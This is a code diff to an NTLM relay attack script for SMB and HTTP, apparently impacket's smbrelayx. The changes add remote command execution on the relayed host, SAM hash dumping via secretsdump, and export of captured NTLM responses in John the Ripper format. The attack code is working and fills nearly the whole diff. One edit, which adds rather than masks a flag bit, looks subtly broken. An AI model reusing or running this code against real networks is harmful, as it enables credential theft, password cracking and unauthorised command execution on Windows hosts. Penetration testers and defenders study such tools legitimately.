@@ -34,30 +34,23 @@
 # programmatically.
 #
 
-import socket
-import string
-import sys
-import types
-import os
-import random
-import time
 import argparse
 import SimpleHTTPServer
-import SocketServer
 import logging
 import base64
+from threading import Thread
+from binascii import unhexlify, hexlify
 
-from impacket import smbserver, smb, ntlm, version
-from impacket.examples import serviceinstall, logger
-from impacket.spnego import *
+from impacket.examples import logger
+from impacket import version, smb3
+from impacket.examples import serviceinstall
 from impacket.smb import *
 from impacket.smbserver import *
 from impacket.dcerpc.v5 import transport
-from impacket.dcerpc.v5 import epm, nrpc
+from impacket.dcerpc.v5 import nrpc
 from impacket.dcerpc.v5.ndr import NULL
-
-
-from threading import Thread
+from impacket.spnego import ASN1_AID
+from impacket.smbconnection import SMBConnection
 
 try:
  from Crypto.Cipher import DES, AES, ARC4
@@ -66,16 +59,64 @@ except Exception:
     logging.critical("See http://www.pycrypto.org/")
 
 class doAttack(Thread):
-    def __init__(self, SMBClient, exeFile):
+    def __init__(self, SMBClient, exeFile, command):
         Thread.__init__(self)
-        self.installService = serviceinstall.ServiceInstall(SMBClient, exeFile)
+
+        if isinstance(SMBClient, smb.SMB) or isinstance(SMBClient, smb3.SMB3):
+            self.__SMBConnection = SMBConnection(existingConnection = SMBClient)
+        else:
+            self.__SMBConnection = SMBClient
+
+        self.__exeFile = exeFile
+        self.__command = command
+        self.__answerTMP = ''
+        if exeFile is not None:
+            self.installService = serviceinstall.ServiceInstall(SMBClient, exeFile)
+
+    def __answer(self, data):
+        self.__answerTMP += data
 
     def run(self):
         # Here PUT YOUR CODE!
-        result = self.installService.install()
-        if result is True:
-            logging.info("Service Installed.. CONNECT!")
-            self.installService.uninstall()
+        if self.__exeFile is not None:
+            result = self.installService.install()
+            if result is True:
+                logging.info("Service Installed.. CONNECT!")
+                self.installService.uninstall()
+        else:
+            from secretsdump import RemoteOperations, SAMHashes
+            samHashes = None
+            remoteOps = None
+            try:
+                # We have to add some flags just in case the original client did not
+                # Why? needed for avoiding INVALID_PARAMETER
+                flags1, flags2 = self.__SMBConnection.getSMBServer().get_flags()
+                flags2 |= smb.SMB.FLAGS2_LONG_NAMES
+                self.__SMBConnection.getSMBServer().set_flags(flags2=flags2)
+
+                remoteOps  = RemoteOperations(self.__SMBConnection, False)
+                remoteOps.enableRegistry()
+                if self.__command is not None:
+                    remoteOps._RemoteOperations__executeRemote(self.__command)
+                    logging.info("Executed specified command on host: %s", self.__SMBConnection.getRemoteHost())
+                    self.__answerTMP = ''
+                    self.__SMBConnection.getFile('ADMIN$', 'Temp\\__output', self.__answer)
+                    print self.__answerTMP
+                    self.__SMBConnection.deleteFile('ADMIN$', 'Temp\\__output')
+                else:
+                    bootKey = remoteOps.getBootKey()
+                    samFileName = remoteOps.saveSAM()
+                    samHashes = SAMHashes(samFileName, bootKey, isRemote = True)
+                    samHashes.dump()
+                    logging.info("Done dumping SAM hashes for host: %s", self.__SMBConnection.getRemoteHost())
+            except Exception, e:
+                logging.error(str(e))
+            finally:
+                if samHashes is not None:
+                    samHashes.finish()
+                if remoteOps is not None:
+                    remoteOps.finish()
+
 
 class SMBClient(smb.SMB):
     def __init__(self, remote_name, extended_security = True, sess_port = 445):
@@ -183,13 +224,13 @@ class SMBClient(smb.SMB):
         if self.machineHashes == '':
             ntHash = None
         else:
-            ntHash = self.machineHashes.split(':')[1].decode('hex')
+            ntHash = unhexlify(self.machineHashes.split(':')[1])
 
         sessionKey = nrpc.ComputeSessionKeyStrongKey('', '12345678', serverChallenge, ntHash)
 
         ppp = nrpc.ComputeNetlogonCredential('12345678', sessionKey)
 
-        resp = nrpc.hNetrServerAuthenticate3(dce, NULL, machineAccount + '\x00', nrpc.NETLOGON_SECURE_CHANNEL_TYPE.WorkstationSecureChannel, serverName+'\x00',ppp, 0x600FFFFF )
+        nrpc.hNetrServerAuthenticate3(dce, NULL, machineAccount + '\x00', nrpc.NETLOGON_SECURE_CHANNEL_TYPE.WorkstationSecureChannel, serverName+'\x00',ppp, 0x600FFFFF )
 
         clientStoredCredential = pack('<Q', unpack('<Q',ppp)[0] + 10)
 
@@ -236,7 +277,7 @@ class SMBClient(smb.SMB):
         else:
             signingKey = resp['ValidationInformation']['ValidationSam4']['UserSessionKey'] 
 
-        logging.info("SMB Signing key: %s " % signingKey.encode('hex'))
+        logging.info("SMB Signing key: %s " % hexlify(signingKey))
 
         self.set_session_key(signingKey)
 
@@ -330,9 +371,9 @@ class SMBClient(smb.SMB):
 
         try:
             smb.isValidAnswer(SMB.SMB_COM_SESSION_SETUP_ANDX)
-        except:
+        except Exception:
             logging.error("SessionSetup Error!")
-            return None
+            raise
         else:
             # We will need to use this uid field for all future requests/responses
             self._uid = smb['Uid']
@@ -349,19 +390,25 @@ class SMBClient(smb.SMB):
 
 class HTTPRelayServer(Thread):
     class HTTPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
-        def __init__(self, server_address, RequestHandlerClass, target, exeFile, mode):
+        def __init__(self, server_address, RequestHandlerClass, target, exeFile, command, mode, outputFile):
             self.target = target
             self.exeFile = exeFile
+            self.command = command
             self.mode = mode
-            self.domainIp = None
-            self.machineAccount = None
-            self.machineHashes = None
+            self.outputFile = outputFile
+
             SocketServer.TCPServer.__init__(self,server_address, RequestHandlerClass)
 
     class HTTPHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
         def __init__(self,request, client_address, server):
             self.server = server
             self.protocol_version = 'HTTP/1.1'
+            self.challengeMessage = None
+            self.target = None
+            self.client = None
+            self.machineAccount = None
+            self.machineHashes = None
+            self.domainIp = None
             logging.info("HTTPD: Received connection from %s, attacking target %s" % (client_address[0] ,self.server.target))
             SimpleHTTPServer.SimpleHTTPRequestHandler.__init__(self,request, client_address, server)
 
@@ -388,7 +435,7 @@ class HTTPRelayServer(Thread):
 
         def do_GET(self):
             messageType = 0
-            if self.headers.getheader('Authorization') == None:
+            if self.headers.getheader('Authorization') is None:
                 self.do_AUTHHEAD(message = 'NTLM')
                 pass
             else:
@@ -405,11 +452,8 @@ class HTTPRelayServer(Thread):
                 if self.server.mode.upper() == 'REFLECTION':
                     self.target = self.client_address[0]
                     logging.info("Downgrading to standard security")
-                    extSec = False
                 else:
                     self.target = self.server.target
-                    extSec = True
-
                 try:
                     self.client = SMBClient(self.target, extended_security = True)
                     self.client.setDomainAccount(self.machineAccount, self.machineHashes, self.domainIp)
@@ -428,7 +472,7 @@ class HTTPRelayServer(Thread):
                 if authenticateMessage['user_name'] != '':
                     respToken2 = SPNEGO_NegTokenResp()
                     respToken2['ResponseToken'] = str(token)
-                    clientResponse, errorCode = self.client.sendAuth(self.challengeMessage['challenge'], respToken2.getData())                
+                    clientResponse, errorCode = self.client.sendAuth(self.challengeMessage['challenge'], respToken2.getData())
                 else:
                     # Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials
                     errorCode = STATUS_ACCESS_DENIED
@@ -439,8 +483,12 @@ class HTTPRelayServer(Thread):
                 else:
                     # Relay worked, do whatever we want here...
                     logging.info("Authenticating against %s as %s\%s SUCCEED" % (self.target,authenticateMessage['domain_name'], authenticateMessage['user_name']))
+                    ntlm_hash_data = outputToJohnFormat( self.challengeMessage['challenge'], authenticateMessage['user_name'], authenticateMessage['domain_name'], authenticateMessage['lanman'], authenticateMessage['ntlm'] )
+                    logging.info(ntlm_hash_data['hash_string'])
+                    if self.server.outputFile is not None:
+                        writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'], self.server.outputFile)
 
-                    clientThread = doAttack(self.client,self.server.exeFile)
+                    clientThread = doAttack(self.client,self.server.exeFile,self.server.command)
                     clientThread.start()
                     # And answer 404 not found
                     self.send_response(404)
@@ -450,9 +498,17 @@ class HTTPRelayServer(Thread):
                     self.end_headers()
             return 
 
-    def __init__(self):
+    def __init__(self, outputFile=None):
         Thread.__init__(self)
         self.daemon = True
+        self.domainIp = None
+        self.machineAccount = None
+        self.machineHashes = None
+        self.exeFile = None
+        self.command = None
+        self.target = None
+        self.mode = None
+        self.outputFile = outputFile
 
     def setTargets(self, target):
         self.target = target
@@ -460,6 +516,9 @@ class HTTPRelayServer(Thread):
     def setExeFile(self, filename):
         self.exeFile = filename
 
+    def setCommand(self, command):
+        self.command = command
+
     def setMode(self,mode):
         self.mode = mode
 
@@ -470,11 +529,11 @@ class HTTPRelayServer(Thread):
 
     def run(self):
         logging.info("Setting up HTTP Server")
-        self.httpd = self.HTTPServer(("", 80), self.HTTPHandler, self.target, self.exeFile, self.mode)
-        self.httpd.serve_forever()
+        httpd = self.HTTPServer(("", 80), self.HTTPHandler, self.target, self.exeFile, self.command, self.mode, self.outputFile)
+        httpd.serve_forever()
 
 class SMBRelayServer(Thread):
-    def __init__(self):
+    def __init__(self, outputFile = None):
         Thread.__init__(self)
         self.daemon = True
         self.server = 0
@@ -483,6 +542,8 @@ class SMBRelayServer(Thread):
         self.domainIp = None
         self.machineAccount = None
         self.machineHashes = None
+        self.exeFile = None
+        self.command = None
 
         # Here we write a mini config for the server
         smbConfig = ConfigParser.ConfigParser()
@@ -493,6 +554,9 @@ class SMBRelayServer(Thread):
         smbConfig.set('global','log_file','smb.log')
         smbConfig.set('global','credentials_file','')
 
+        if outputFile is not None:
+            smbConfig.set('global','jtr_dump_path',outputFile)
+
         # IPC always needed
         smbConfig.add_section('IPC$')
         smbConfig.set('IPC$','comment','')
@@ -518,8 +582,8 @@ class SMBRelayServer(Thread):
         if smbData.has_key(self.target):
             # Remove the previous connection and use the last one
             smbClient = smbData[self.target]['SMBClient']
-            del(smbClient)
-            del (smbData[self.target])
+            del smbClient
+            del smbData[self.target]
         logging.info("SMBD: Received connection from %s, attacking target %s" % (connData['ClientIP'] ,self.target))
         try: 
             if recvPacket['Flags2'] & smb.SMB.FLAGS2_EXTENDED_SECURITY == 0:
@@ -529,7 +593,7 @@ class SMBRelayServer(Thread):
                     # Force standard security when doing reflection
                     logging.info("Downgrading to standard security")
                     extSec = False
-                    recvPacket['Flags2'] = recvPacket['Flags2'] & ( ~smb.SMB.FLAGS2_EXTENDED_SECURITY )
+                    recvPacket['Flags2'] += (~smb.SMB.FLAGS2_EXTENDED_SECURITY)
                 else:
                     extSec = True
             client = SMBClient(self.target, extended_security = extSec)
@@ -569,7 +633,7 @@ class SMBRelayServer(Thread):
             sessionSetupData.fromString(SMBCommand['Data'])
             connData['Capabilities'] = sessionSetupParameters['Capabilities']
 
-            if struct.unpack('B',sessionSetupData['SecurityBlob'][0])[0] != smb.ASN1_AID:
+            if struct.unpack('B',sessionSetupData['SecurityBlob'][0])[0] != ASN1_AID:
                # If there no GSSAPI ID, it must be an AUTH packet
                blob = SPNEGO_NegTokenResp(sessionSetupData['SecurityBlob'])
                token = blob['ResponseToken']
@@ -617,14 +681,11 @@ class SMBRelayServer(Thread):
 
             elif messageType == 0x03:
                 # AUTHENTICATE_MESSAGE, here we deal with authentication
-                authenticateMessage = ntlm.NTLMAuthChallengeResponse()
-                authenticateMessage.fromString(token)
 
                 #############################################################
                 # SMBRelay: Ok, so now the have the Auth token, let's send it
                 # back to the target system and hope for the best.
                 smbClient = smbData[self.target]['SMBClient']
-                authData = sessionSetupData['SecurityBlob']
                 authenticateMessage = ntlm.NTLMAuthChallengeResponse()
                 authenticateMessage.fromString(token)
                 if authenticateMessage['user_name'] != '':
@@ -654,8 +715,12 @@ class SMBRelayServer(Thread):
                 else:
                     # We have a session, create a thread and do whatever we want
                     logging.info("Authenticating against %s as %s\%s SUCCEED" % (self.target,authenticateMessage['domain_name'], authenticateMessage['user_name']))
+                    ntlm_hash_data = outputToJohnFormat( connData['CHALLENGE_MESSAGE']['challenge'], authenticateMessage['user_name'], authenticateMessage['domain_name'], authenticateMessage['lanman'], authenticateMessage['ntlm'] )
+                    logging.info(ntlm_hash_data['hash_string'])
+                    if self.server.getJTRdumpPath() != '':
+                        writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'], self.server.getJTRdumpPath())
                     del (smbData[self.target])
-                    clientThread = doAttack(smbClient,self.exeFile)
+                    clientThread = doAttack(smbClient,self.exeFile,self.command)
                     clientThread.start()
                     # Now continue with the server
                 #############################################################
@@ -669,7 +734,7 @@ class SMBRelayServer(Thread):
                 # Let's store it in the connection data
                 connData['AUTHENTICATE_MESSAGE'] = authenticateMessage
             else:
-                raise("Unknown NTLMSSP MessageType %d" % messageType)
+                raise Exception("Unknown NTLMSSP MessageType %d" % messageType)
 
             respParameters['SecurityBlobLength'] = len(respToken)
 
@@ -714,8 +779,12 @@ class SMBRelayServer(Thread):
                 # Now continue with the server
             else:
                 # We have a session, create a thread and do whatever we want
+                ntlm_hash_data = outputToJohnFormat( '', sessionSetupData['Account'], sessionSetupData['PrimaryDomain'], sessionSetupData['AnsiPwd'], sessionSetupData['UnicodePwd'] )
+                logging.info(ntlm_hash_data['hash_string'])
+                if self.server.getJTRdumpPath() != '':
+                    writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'], self.server.getJTRdumpPath())
                 del (smbData[self.target])
-                clientThread = doAttack(smbClient,self.exeFile)
+                clientThread = doAttack(smbClient,self.exeFile,self.command)
                 clientThread.start()
                 # Remove the target server from our connection list, the work is done
                 # Now continue with the server
@@ -756,6 +825,9 @@ class SMBRelayServer(Thread):
     def setExeFile(self, filename):
         self.exeFile = filename
 
+    def setCommand(self, command):
+        self.command = command
+
     def setMode(self,mode):
         self.mode = mode
 
@@ -768,11 +840,16 @@ class SMBRelayServer(Thread):
 if __name__ == '__main__':
 
     RELAY_SERVERS = ( SMBRelayServer, HTTPRelayServer )
+    # Init the example's logger theme
+    logger.init()
     print version.BANNER
     parser = argparse.ArgumentParser(add_help = False, description = "For every connection received, this module will try to SMB relay that connection to the target system or the original client")
     parser.add_argument("--help", action="help", help='show this help message and exit')
     parser.add_argument('-h', action='store', metavar = 'HOST', help='Host to relay the credentials to, if not it will relay it back to the client')
-    parser.add_argument('-e', action='store', required=True, metavar = 'FILE', help='File to execute on the target system')
+    parser.add_argument('-e', action='store', required=False, metavar = 'FILE', help='File to execute on the target system. If not specified, hashes will be dumped (secretsdump.py must be in the same directory)')
+    parser.add_argument('-c', action='store', type=str, required=False, metavar = 'COMMAND', help='Command to execute on target system. If not specified, hashes will be dumped (secretsdump.py must be in the same directory)')
+    parser.add_argument('-outputfile', action='store',
+                        help='base output filename for encrypted hashes. Suffixes will be added for ntlm and ntlmv2')
     parser.add_argument('-machine-account', action='store', required=False, help='Domain machine account to use when interacting with the domain to grab a session key for signing, format is domain/machine_name')
     parser.add_argument('-machine-hashes', action="store", metavar = "LMHASH:NTHASH", help='Domain machine hashes, format is LMHASH:NTHASH')
     parser.add_argument('-domain', action="store", help='Domain FQDN or IP to connect using NETLOGON')
@@ -797,17 +874,20 @@ if __name__ == '__main__':
         mode = 'REFLECTION'
 
     exeFile = options.e
+    Command = options.c
 
     for server in RELAY_SERVERS:
-        s = server()
+        s = server(options.outputfile)
         s.setTargets(targetSystem)
         s.setExeFile(exeFile)
+        s.setCommand(Command)
         s.setMode(mode)
         if options.machine_account is not None and options.machine_hashes is not None and options.domain is not None:
             s.setDomainAccount( options.machine_account,  options.machine_hashes,  options.domain)
         elif (options.machine_account is None and options.machine_hashes is None and options.domain is None) is False:
             logging.error("You must specify machine-account/hashes/domain all together!")
             sys.exit(1)
+
         s.start()
         
     print ""
